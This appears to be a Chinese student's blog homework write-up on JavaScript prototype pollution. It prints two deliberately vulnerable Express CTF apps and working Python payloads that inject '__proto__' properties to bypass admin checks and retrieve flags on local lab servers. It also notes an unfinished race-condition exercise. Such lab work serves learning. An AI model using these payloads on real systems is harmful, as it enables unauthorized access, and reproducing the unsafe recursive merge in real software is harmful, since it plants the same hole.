安全作业-Race竞争型漏洞、原型链污染

已于 2023-08-03 18:21:39 修改
阅读量1.4k 收藏
点赞数
文章标签: 安全
于 2023-08-03 01:48:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55364077/article/details/132073703
版权

1.race漏洞一直卡在虚拟机安装上(待研究)

2.原型链污染

  一、第一题js代码

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。

由代码可知,全文没有对user.admintokn 进行赋值,所以理论上这个值时不存在的,但是下面有一句赋值语句:

matrix[client.row][client.col] = client.data

data,row,col,都是我们post传入的值,都是可控的,所以可以构造原型链污染

二、给出payload和执行结果

import requests
import json

url1 = "http://192.168.56.1:3000/api"
url2 = "http://192.168.56.1:3000/admin?querytoken=5881ca97cfe9782358a88e0b31092814"

headers = {"Content-type": "application/json"}
data = {"row": "__proto__", "col": "admintoken", "data": "oupeng"}


res1 = requests.post(url1, headers=headers, data=json.dumps(data))
res2 = requests.get(url2)

print(res2.text)

 三、第二题js代码

'use strict';

const express = require('express');
const bodyParser = require('body-parser')
const cookieParser = require('cookie-parser');
const path = require('path');


const isObject = obj => obj && obj.constructor && obj.constructor === Object;

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

function clone(a) {
    return merge({}, a);
}

// Constants
const PORT = 8080;
const HOST = '0.0.0.0';
const admin = {};

// App
const app = express();
app.use(bodyParser.json())
app.use(cookieParser());

app.use('/', express.static(path.join(__dirname, 'views')));
app.post('/signup', (req, res) => {
    var body = JSON.parse(JSON.stringify(req.body)); 
    var copybody = clone(body)
    if (copybody.name) {
        res.cookie('name', copybody.name).json({
            "done": "cookie set"
        });
    } else {
        res.json({
            "error": "cookie not set"
        })
    }
});
app.get('/getFlag', (req, res) => {
    var аdmin = JSON.parse(JSON.stringify(req.cookies))
    if (admin.аdmin == 1) {
        res.send("hackim19{}");
    } else {
        res.send("You are not authorized");
    }
});
app.listen(PORT, HOST);
console.log(`Running on http://${HOST}:${PORT}`);

获取flag的条件是admin.аdmin == 1而admin 本身是一个object,其admin 属性本身并不存在,而且还有一个敏感函数 merg,merge 函数作用是进行对象的合并,其中涉及到了对象的赋值,且键值可控,这样就可以触发原形链污染

四、给出payload和执行结果

import requests
import json

url1 = "http://127.0.0.1:8080/signup"
url2 = "http://127.0.0.1:8080/getflag"

headers = {"Content-type": "application/json"}
data = {"__proto__": {"аdmin": 1}}


res1 = requests.post(url1, headers=headers, data=json.dumps(data))
res2 = requests.get(url2)

print(res2.text)

qq_55364077
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
smart-race中文说明_clontech
09-08
clontech smart-race,中文说明中文使用说明书。clontech smart-race,中文说明中文使用说明书。clontech smart-race,中文说明中文使用说明书。
chart-race-react:React React的无缝条形图竞赛组件
02-05
npm install --save chart-race-react import BarChart from 'chart-race-react' ; 您应该将BarChart包装在充当沙箱的容器div中。 BarChart的宽度适合容器的宽度。 用法 传递道具。 您将需要将自己的道具传递...
原型链污染及Race漏洞
Mr_Rongyao的博客
08-03 137
通俗点说:原型链污染就是一个函数下的一个实例对象对该函数的原进行了修改,然后让该函数下的其他对象访问这个函数时,就都会得到被修改后的原对象。例// foo是一个简单的JavaScript对象 let foo = {
JS沙箱绕过以及竞争条件漏洞复现
求大佬师傅带
08-02 619
JS沙箱绕过以及竞争条件漏洞复现
Race竞争漏洞的复现以及沙箱逃逸结合正则
qalx9的博客
08-02 131
在后台我们可以发现,我们的余额只有10,但是由于请求成功了3次,所以,体现记录达到了3次,这样我们就损失了20元钱,就会造成我们的财力损失。首先,我们先分析一下这个正则表达式,,明显可以看出,这里过滤了`, ', ",+,-,!的机制,在你执行提取现金的业务时,我们将你的这个线程进行锁住,不让它被进行干扰,当你提取完成后,我们在将其放开。这样是否就解决了这个问题了。进而我们可以得到沙箱绕过的核心原理了:只要我们能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱。
二进制漏洞分析与挖掘
05-16 5451
本公众号分享的所有技术仅用于学习交流,请勿用于其他非法活动,如果错漏,欢迎留言指正 二进制漏洞分析与挖掘 《0day安全:软件漏洞分析技术第2版》王清电子工业出版社 入门用,但不全,过时了,linux部分没有包含进去 漏洞分析、挖掘和利用,安全领域重要和最具挑战性和对抗性的分支 应用在综合开发,算法,语法,系统底层,内核,逆向,汇编,调试等方方面面 漏洞是怎么回事? BUG:软件的功能性逻辑缺陷。影响软件的正常功能。 漏洞:能够导致软件做一些超出设计范围的事情的bug,则漏洞。这类BU..
【网络安全---Linux入门】Linux入门教程(非常详细)从零基础入门熟练使用,看完这一篇就够了
m0_67844671的博客
09-28 2459
详细的Linux入门教程,包括基础命令,文件操作,权限操作,软件下载安装,配置文件基础配置,网络配置,部署服务器等等,可以让你快速掌握Linux系统的基本知识;
底软基础 | 嵌入式程序员编程必看的525钟C/C++ 安全编程问题
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
07-10 1076
360 安全规则集合》简称《安规集》,是一套详细的 C/C++ 安全编程指南,由 360 集团质量工程部编著,将编程时需要注意的问题总结成若干规则,可为制定编程规范提供依据,也可为代码审计或相关培训提供指导意见,旨在提升软件产品的可靠性、健壮性、可移植性以及可维护性,从而提升软件产品的综合安全性能。
[转]信息安全相关理论题(四)
热门推荐
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、网上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
前端面试--111
家有佳欣宝贝的博客
12-18 2012
<body> <div id="app"> <input type="text" id="txt"> <p id="show"></p> </div> </body> <script type="text/javascript"> var obj = {} Object.defineProperty(obj, 'txt', { get: function () { return obj },
Java面试题总结(一)
浅羽技术
05-03 760
Java面试题总结(一)
A-day-at-the-race.zip_race
09-24
Python适合快速原开发,而Java和C++更适合大项目,提供更好的性能。 总之,“A-day-at-the-race.zip_race”挑战不仅是对编程技巧的考验,也是对逻辑思维和问题解决能力的锻炼。通过这个项目,开发者可以深入...
horse-race-lamp.zip_race
09-24
**标签“race”** 可能指的是跑马灯效果中的“赛马”概念,即灯光的顺序变化模仿了赛马比赛中的马匹顺序。 总的来说,跑马灯程序是学习单片机编程和硬件控制的一个基础示例,它涵盖了单片机的GPIO控制、基本的循环...
安全:企业上云后不可忽视的安全挑战与解决方案
A526847的博客
08-14 566
企业上云是数字化转的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转中,云安全将成为企业不可或缺的重要保障。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
最新发布
jiuxindianzi的博客
08-16 392
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
等保2.0时代,企业如何平衡安全与发展
waitaikong_的博客
08-14 352
此外,等保2.0还强化了安全管理的要求,企业需要建立完善的安全管理体系,包括安全策略、管理制度、人员培训、应急预案等,以确保安全保护措施的有效实施。等保2.0(网络安全等级保护2.0)是中国网络安全领域的重要标准,它在原有等保1.0的基础上进行了全面升级,以适应云计算、大数据、物联网、移动互联网等新兴技术的安全保护需求。等保2.0的实施促使企业加强网络安全管理和技术防范措施,这不仅有助于提升企业的网络安全防护水平,降低安全风险,还能提高企业的竞争力和信誉度。
NVR方案背景与产品介绍与构建一套完整的NVR产品解决方案
LntonCEC的博客
08-14 671
此外,NVR还可以支持更多的应用场景,由于视频监控系统越来越需要具备扩展性,如果计划在未来增加更多的IP摄像机,那么NVR可能更适合。基于 HiSilicon 平台的 NVR 解决方案凭借其卓越的性能和灵活的功能,已经在市场上占据了一定的份额,并且具有广阔的市场前景。通过友好的管理界面,管理员可以轻松完成用户权限的配置、设备的远程升级、日志的查看与管理等操作。,但都在视频监控中扮演着重要的角色。用户可以通过 GUI 进行摄像机的管理、录像的配置、告警的设置等操作,减少了系统的学习成本,提高了操作效率。
利用Jieba对CDIAL-BIAS-race文件进行分词,并抽取词表。
06-12
好的,我可以帮你解决这个问题。 首先,你需要下载CDIAL-BIAS-race数据集。该数据集是一个中文阅读理解数据集,包含了多篇文章和对应的问题以及答案。 然后,你需要安装Jieba库,可以使用以下命令进行安装: ``` pip install jieba ``` 接着,你可以使用以下代码对CDIAL-BIAS-race文件进行分词并抽取词表: ```python import jieba # 读取文件 with open('CDIAL-BIAS-race/train/high/high_1.txt', 'r', encoding='utf-8') as f: text = f.read() # 进行分词 words = jieba.lcut(text) # 抽取词表 vocab = set(words) print(vocab) ``` 在这个代码中,我们首先读取了CDIAL-BIAS-race数据集中的一个文件,然后使用Jieba对文件进行了分词。最后,我们使用Python中的set数据结构抽取了词表,并打印输出了词表。 这样,你就可以利用Jieba对CDIAL-BIAS-race文件进行分词,并抽取词表了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值